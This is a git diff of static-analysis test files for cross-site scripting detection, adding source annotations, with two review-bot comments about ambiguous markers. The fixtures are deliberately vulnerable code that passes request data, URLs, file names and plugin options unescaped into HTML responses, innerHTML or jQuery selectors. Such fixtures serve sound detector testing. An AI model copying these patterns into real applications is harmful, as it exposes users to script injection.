@@ -143,7 +143,7 @@ app.get('/user/:id', function (req, res) { }); (function () { - var foo = document.location.search; + var foo = document.location.search; // $ Source new Promise(resolve => unknown(foo, resolve)).catch((e) => { $('myId').html(e); // $ Alert @@ -177,7 +177,7 @@ app.get('/user/:id', function (req, res) { })(); app.get('/user/:id', function (req, res) { - unknown(req.params.id, (error, res) => { + unknown(req.params.id, (error, res) => { // $ Source if (error) { $('myId').html(error); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js index 667bbe822140..c6be2e55e87e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js @@ -60,7 +60,7 @@ app.get('/user/:id', function (req, res) { .use(doc, { title: '👋🌍' }) .use(format) .use(html) - .process(req.body, function (err, file) { + .process(req.body, function (err, file) { // $ Source res.send(file); // $ Alert }); @@ -70,7 +70,7 @@ app.get('/user/:id', function (req, res) { res.send(unified().use(markdown).processSync(req.body).toString); // $ Alert - remark().process(req.body, (e, f) => { + remark().process(req.body, (e, f) => { // $ Source res.send(f); // $ Alert }) }); @@ -110,9 +110,9 @@ hapi.route({ }}); app.get("invalid/keys/:id", async (req, res) => { - const { keys: queryKeys } = req.query; + const { keys: queryKeys } = req.query; // $ Source const paramKeys = req.params; - const keys = queryKeys || paramKeys?.keys; + const keys = queryKeys || paramKeys?.keys; // $ Source const keyArray = typeof keys === 'string' ? [keys] : keys; const invalidKeys = keyArray.filter(key => !whitelist.includes(key)); 
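Review bot: The second `// $ Source` in the `invalid/keys/:id` handler (hunk at -110) is ambiguous. It sits on `const keys = queryKeys || paramKeys?.keys;`, which merges the already-marked `req.query` flow with a read from `paramKeys`, while the `req.params` access on the line above is left unmarked. Presumably the marker refers to the `paramKeys?.keys` property read, but the test does not say so. A trailing note in the style used elsewhere in these tests would settle it, e.g. `// $ Source - the paramKeys?.keys read, not queryKeys`. The handler continues outside the hunk, so the matching `// $ Alert` is not visible here.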
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js index 5ab9f9d6f265..996f093aa15c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js @@ -132,7 +132,7 @@ function escapeHtml4(s) { } app.get('/user/:id', function (req, res) { - const url = req.params.id; + const url = req.params.id; // $ Source res.send(escapeHtml1(url)); res.send(escapeHtml2(url)); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/etherpad.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/etherpad.js index c7e60092d7ef..8377357a0c4c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/etherpad.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/etherpad.js @@ -6,7 +6,7 @@ app.get("/some/path", (req, res) => { let response = "Hello, world!"; if(req.query.jsonp && isVarName(req.query.jsonp)) - response = req.query.jsonp + "(" + response + ")"; + response = req.query.jsonp + "(" + response + ")"; // $ Source res.send(response); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js index 448f12270783..a359780e57b0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js @@ -1,7 +1,7 @@ var express = require('express'); express().get('/user/', function(req, res) { - var evil = req.query.evil; + var evil = req.query.evil; // $ Source res.send(console.log("
    %s
    ", evil)); // OK - returns undefined res.send(util.format("
    %s
    ", evil)); // $ Alert res.send(require("printf")("
    %s
    ", evil)); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js index cd6ca0c9e3da..9e03025792d0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js @@ -1,13 +1,13 @@ var liveServer = require("live-server"); const middleware = [function(req, res, next) { - const tainted = req.url; + const tainted = req.url; // $ Source res.end(`${tainted}`); // $ Alert }]; middleware.push(function(req, res, next) { - const tainted = req.url; + const tainted = req.url; // $ Source res.end(`${tainted}`); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js index 105080e5fba2..a0f2120b2c4f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js @@ -10,7 +10,7 @@ app.get("/some/path", (req, res) => { res.send(x + y); // $ Alert } - let callback = sendResponse.bind(null, req.url); + let callback = sendResponse.bind(null, req.url); // $ Source [1, 2, 3].forEach(callback); }); @@ -19,7 +19,7 @@ app.get("/underscore", (req, res) => { res.send(x + y); // $ Alert } - let callback = underscore.partial(sendResponse, req.url); + let callback = underscore.partial(sendResponse, req.url); // $ Source [1, 2, 3].forEach(callback); }); @@ -28,7 +28,7 @@ app.get("/lodash", (req, res) => { res.send(x + y); // $ Alert } - let callback = lodash.partial(sendResponse, req.url); + let callback = lodash.partial(sendResponse, req.url); // $ Source [1, 2, 3].forEach(callback); }); 
@@ -37,7 +37,7 @@ app.get("/ramda", (req, res) => { res.send(x + y); // $ Alert } - let callback = R.partial(sendResponse, [req.url]); + let callback = R.partial(sendResponse, [req.url]); // $ Source [1, 2, 3].forEach(callback); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js index 392a1f7ec612..41eb48b68d65 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js @@ -2,7 +2,7 @@ let express = require('express'); let app = express(); app.get("/some/path", (req, res) => { - new Promise((resolve, reject) => resolve(req.query.data)) + new Promise((resolve, reject) => resolve(req.query.data)) // $ Source .then(x => res.send(x)); // $ Alert new Promise((resolve, reject) => resolve(req.query.data)) diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js index 35021ea39120..660743338848 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js @@ -3,7 +3,7 @@ var express = require('express'); var app = express(); app.get('/user/:id', function(req, res) { - let { p, q: r } = req.params; + let { p, q: r } = req.params; // $ Source res.send(p); // $ Alert res.send(r); // $ Alert }); @@ -11,7 +11,7 @@ app.get('/user/:id', function(req, res) { const aKnownValue = "foo"; app.get('/bar', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source if (p == aKnownValue) res.send(p); @@ -27,7 +27,7 @@ app.get('/bar', function(req, res) { const clone = require('clone'); app.get('/baz', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source var obj = {}; obj.p = p; 
@@ -40,7 +40,7 @@ app.get('/baz', function(req, res) { const serializeJavaScript = require('serialize-javascript'); app.get('/baz', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source var serialized = serializeJavaScript(p); @@ -54,7 +54,7 @@ app.get('/baz', function(req, res) { const fclone = require('fclone'); app.get('/baz', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source var obj = {}; obj.p = p; @@ -66,7 +66,7 @@ app.get('/baz', function(req, res) { const jc = require('json-cycle'); app.get('/baz', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source var obj = {}; obj.p = p; @@ -79,7 +79,7 @@ app.get('/baz', function(req, res) { const sortKeys = require('sort-keys'); app.get('/baz', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source var obj = {}; obj.p = p; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js index 61d153498e74..5419959d61ec 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js @@ -2,12 +2,12 @@ var express = require('express'); var app = express(); app.enable('x-powered-by').disable('x-powered-by').get('/', function (req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source res.send(p); // $ Alert }); const prettier = require("prettier"); app.post("foobar", function (reg, res) { - const code = prettier.format(reg.body, { semi: false, parser: "babel" }); + const code = prettier.format(reg.body, { semi: false, parser: "babel" }); // $ Source res.send(code); // $ Alert }); \ No newline at end of file 
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js index be96d05a400a..0233339ad26e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js @@ -4,7 +4,7 @@ var fs = require('fs'); var express = require('express'); express().get('/', function(req, res) { - fs.readdir("/myDir", function (error, files1) { + fs.readdir("/myDir", function (error, files1) { // $ Source res.send(files1); // $ Alert }); }); @@ -22,7 +22,7 @@ http.createServer(function (req, res) { return files3.join(''); } - fs.readdir("/myDir", function (error, files1) { + fs.readdir("/myDir", function (error, files1) { // $ Source res.write(files1); // $ Alert var dirs = []; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js index 4f712f2604e7..2569f5623d74 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js @@ -3,6 +3,6 @@ const parseTorrent = require('parse-torrent'), express().get('/user/:id', function(req, res) { let torrent = parseTorrent(unknown), - name = torrent.name; + name = torrent.name; // $ Source res.send(name); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js index fb229199e687..40f33d8edb3f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js 
@@ -8,7 +8,7 @@ $("" + $.trim("foo") + ""); })); -$.fn.myPlugin = function (stuff, options) { +$.fn.myPlugin = function (stuff, options) { // $ Source $("#foo").html("" + options.foo + ""); // $ Alert $("#foo").html("" + stuff + ""); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts index 9c48ed8c23f5..7e546c05d103 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts @@ -1,4 +1,4 @@ -export function trivialXss(s: string) { +export function trivialXss(s: string) { // $ Source const html = "" + s + ""; // $ Alert document.querySelector("#html").innerHTML = html; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts index 3ec0e2007396..a69e6e5626d7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts @@ -1,9 +1,9 @@ -export function trivialXss(s: string) { +export function trivialXss(s: string) { // $ Source const html = "" + s + ""; // $ Alert - this file is recognized as a main file. document.querySelector("#html").innerHTML = html; } -export function objectStuff(settings: any, i: number) { +export function objectStuff(settings: any, i: number) { // $ Source document.querySelector("#html").innerHTML = "" + settings + ""; // $ Alert var name; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts index 9566ce8468a8..3c7ac0103431 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts @@ -1,4 +1,4 @@ -export function trivialXss(s: string) { +export function trivialXss(s: string) { // $ Source const html = "" + s + ""; // $ Alert - this file is not recognized as a main file. document.querySelector("#html").innerHTML = html; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js index 061a82c862d7..78da04582957 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js @@ -1,14 +1,14 @@ -module.exports.xssThroughHTMLConstruction = function (s) { +module.exports.xssThroughHTMLConstruction = function (s) { // $ Source const html = "" + s + "";// $ Alert document.querySelector("#html").innerHTML = html; } -module.exports.xssThroughXMLParsing = function (s) { +module.exports.xssThroughXMLParsing = function (s) { // $ Source const doc = new DOMParser().parseFromString(s, "text/xml"); // $ Alert document.querySelector("#xml").appendChild(doc.documentElement); } -module.exports.xssThroughMoreComplexXMLParsing = function (s) { +module.exports.xssThroughMoreComplexXMLParsing = function (s) { // $ Source const doc = new DOMParser().parseFromString(s, "text/xml"); // $ Alert const xml = doc.documentElement; @@ -18,7 +18,7 @@ module.exports.xssThroughMoreComplexXMLParsing = function (s) { } const markdown = require('markdown-it')({html: true}); -module.exports.xssThroughMarkdown = function (s) { +module.exports.xssThroughMarkdown = function (s) { // $ Source const html = markdown.render(s); // $ Alert document.querySelector("#markdown").innerHTML = html; } 
@@ -53,7 +53,7 @@ module.exports.createsClass = function (s) { return new Foo(s); } -$.fn.xssPlugin = function (options) { +$.fn.xssPlugin = function (options) { // $ Source const defaults = { name: "name" }; @@ -63,7 +63,7 @@ $.fn.xssPlugin = function (options) { }); } -module.exports.guards = function (attrVal) { +module.exports.guards = function (attrVal) { // $ Source document.querySelector("#id").innerHTML = "\"""; // $ Alert document.querySelector("#id").innerHTML = "\"""; if (attrVal.indexOf("\"") === -1 && attrVal.indexOf("'") === -1) { @@ -76,7 +76,7 @@ module.exports.intentionalTemplate = function (obj) { document.querySelector("#template").innerHTML = html; } -module.exports.types = function (val) { +module.exports.types = function (val) { // $ Source if (typeof val === "string") { $("#foo").html("" + val + ""); // $ Alert } else if (typeof val === "number") { @@ -90,12 +90,12 @@ function createHTML(x) { return "" + x + ""; // $ Alert } -module.exports.usesCreateHTML = function (x) { +module.exports.usesCreateHTML = function (x) { // $ Source $("#foo").html(createHTML(x)); } const myMermaid = require('mermaid'); -module.exports.usesCreateHTML = function (x) { +module.exports.usesCreateHTML = function (x) { // $ Source myMermaid.render("id", x, function (svg) { // $ Alert $("#foo").html(svg); }); @@ -113,7 +113,7 @@ module.exports.usesCreateHTML = function (x) { }); } -module.exports.xssThroughMarkdown = function (s) { +module.exports.xssThroughMarkdown = function (s) { // $ Source const html = markdown.render(s); // $ Alert document.querySelector("#markdown").innerHTML = html; } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts index a00719d74408..1c50460050cf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts 
+++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts @@ -1,9 +1,9 @@ -export function basicHtmlConstruction(s: string) { +export function basicHtmlConstruction(s: string) { // $ Source const html = "" + s + ""; // $ Alert document.body.innerHTML = html; } -export function insertIntoCreatedDocument(s: string) { +export function insertIntoCreatedDocument(s: string) { // $ Source const newDoc = document.implementation.createHTMLDocument(""); newDoc.body.innerHTML = "" + s + ""; // $ SPURIOUS: Alert - inserted into document disconnected from the main DOM. } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js index 896c4f8af210..315644f407df 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js @@ -1,5 +1,5 @@ (function(){ - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source $(options); // $ Alert - or is it? $(options.target); // $ Alert @@ -62,18 +62,18 @@ }; - $.fn.my_plugin = function my_plugin(element, options) { + $.fn.my_plugin = function my_plugin(element, options) { // $ Source this.$element = $(element); this.options = $.extend({}, options); if (this.options.parent) this.$parent = $(this.options.parent) // $ Alert }; - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source $(options.foo.bar.baz); // $ Alert $(options.html); }; - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source $(x).appendTo(options.foo.bar.baz); // $ Alert }; 
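Review bot: The bare `// $ Source` on `function my_plugin(element, options)` (hunk at -62 of unsafe-jquery-plugin.js) does not say which parameter is the expected source. In the body, `$(element)` carries no `// $ Alert` while `$(this.options.parent)` does, so presumably only `options` is meant. If that reading is right, a trailing note would record it, e.g. `// $ Source - options; element is not expected to be a source`. Without it, a later change that starts treating `element` as a source on the same line would not be noticed from the marker alone.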
@@ -81,7 +81,7 @@ $("#" + options.target); }; - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source function f(o) { this.o = $.extend({}, o); var t = this.o.target; @@ -98,7 +98,7 @@ $(target); }; - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source options = $.extend({ menu: '
    ', target: '.my_plugin' @@ -111,28 +111,28 @@ menu: '
    ', target: '.my_plugin' }; - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source options = $.extend({}, $.fn.my_plugin.defaults, options); $(options.menu); $(options.target); // $ Alert }; var pluginName = "my_plugin"; - $.fn[pluginName] = function my_plugin(options) { + $.fn[pluginName] = function my_plugin(options) { // $ Source $(options.target); // $ Alert }; $.extend($.fn, { - my_plugin: function my_plugin(options) { + my_plugin: function my_plugin(options) { // $ Source $(options.target); // $ Alert } }); - $.fn.affix = function my_plugin(options) { + $.fn.affix = function my_plugin(options) { // $ Source $(options.target); // $ Alert }; - $.fn.tooltip = function my_plugin(options) { + $.fn.tooltip = function my_plugin(options) { // $ Source $(options.viewport.selector); // $ Alert }; @@ -150,14 +150,14 @@ $(unintentional); // OK - but should be flagged by another query } - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source let target = options.target; target === DEFAULTS.target? $(target): $(document).find(target); options.target === DEFAULTS.target? $(options.target): $(document).find(options.target); options.targets.a === DEFAULTS.target? $(options.target.a): $(document).find(options.target.a); // $ SPURIOUS: Alert - should be sanitized by `MembershipTestSanitizer` - but still flagged because `AccessPath` can't handle these deeply nested properties } - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source $(anyPrefix + options.target); // OK - unlikely to be a html/css prefix confusion $(something.replace("%PLACEHOLDER%", options.target)); // OK - (unlikely to be a html/css prefix confusion); 
@@ -175,14 +175,14 @@ function setupPlugin(o) { $.fn.my_plugin = o.f } - setupPlugin({f: function(options) { + setupPlugin({f: function(options) { // $ Source $(options.target); // $ Alert }}); setupPlugin({f:function(options) { $(document).find(options.target); }}); - $.fn.position = function( options ) { + $.fn.position = function( options ) { // $ Source if ( !options || !options.of ) { return doSomethingElse( this, arguments ); } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts index e9ca1f400890..084950e8e08e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts @@ -9,7 +9,7 @@ import { NgForm } from "@angular/forms"; ` }) export class Foo { - field: string = ""; + field: string = ""; // $ Source safeField: string = ""; setInput1(event) { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js index c78fc9284a15..e57ef84dc429 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js @@ -5,10 +5,10 @@ const FormikBasic = () => (
    { + validate={values => { // $ Source $("#id").html(values.foo); // $ Alert }} - onSubmit={(values, { setSubmitting }) => { + onSubmit={(values, { setSubmitting }) => { // $ Source $("#id").html(values.bar); // $ Alert }} > @@ -21,17 +21,17 @@ const FormikBasic = () => ( const FormikEnhanced = withFormik({ mapPropsToValues: () => ({ name: '' }), - validate: values => { + validate: values => { // $ Source $("#id").html(values.email); // $ Alert }, - handleSubmit: (values, { setSubmitting }) => { + handleSubmit: (values, { setSubmitting }) => { // $ Source $("#id").html(values.email); // $ Alert } })(MyForm); (function () { - const { values, submitForm } = useFormikContext(); + const { values, submitForm } = useFormikContext(); // $ Source $("#id").html(values.email); // $ Alert $("#id").html(submitForm.email); @@ -41,7 +41,7 @@ import { Form } from 'react-final-form' const App = () => (
    { + onSubmit={async values => { // $ Source $("#id").html(values.stooge); // $ Alert }} initialValues={{ stooge: 'larry', employed: false }} @@ -68,7 +68,7 @@ import { useForm } from 'react-hook-form'; function HookForm() { const { register, handleSubmit, errors } = useForm(); // initialize the hook - const onSubmit = (data) => { + const onSubmit = (data) => { // $ Source $("#id").html(data.name); // $ Alert }; @@ -89,7 +89,7 @@ function HookForm2() {